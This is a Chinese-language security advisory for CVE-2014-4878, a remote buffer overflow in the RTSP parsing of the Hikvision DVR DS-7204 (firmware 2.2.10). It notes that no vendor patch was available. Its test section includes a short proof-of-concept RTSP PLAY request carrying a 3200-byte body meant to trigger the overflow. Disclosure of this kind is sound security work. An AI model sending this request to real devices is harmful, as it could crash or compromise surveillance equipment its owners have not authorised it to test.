当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Hikvision DVR DS-7204远程缓冲区溢出漏洞(CVE-2014-4878)

     发表日期:2014-12-05 10:09:52

Hikvision DVR DS-7204远程缓冲区溢出漏洞(CVE-2014-4878)

BugTraq-ID:71302

CVE-ID:CVE-2014-4878

发布日期:2014-11-24

更新日期:2014-11-27

受影响系统:

hikvision DVR DS-7204 2.2.10

详细信息:

Hikvision DVR DS-7204是硬盘录像机产品。 Hikvision DVR DS-7204(固件版本2.2.10)在RTSP请求主体解析代码的实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响设备上下文中执行任意代码。

来源:

Mark Schloesser

测试方法:

警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!request = "PLAY rtsp://%s/ RTSP/1.0\\r\\n" % HOST request += "CSeq: 7\\r\\n" request += "Authorization: Basic AAAAAAA\\r\\n" request += "Content-length: 3200\\r\\n\\r\\n" request += "A"*3200

解决办法:

厂商补丁:

hikvision

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.hikvision.com/en/products_show.asp?id=506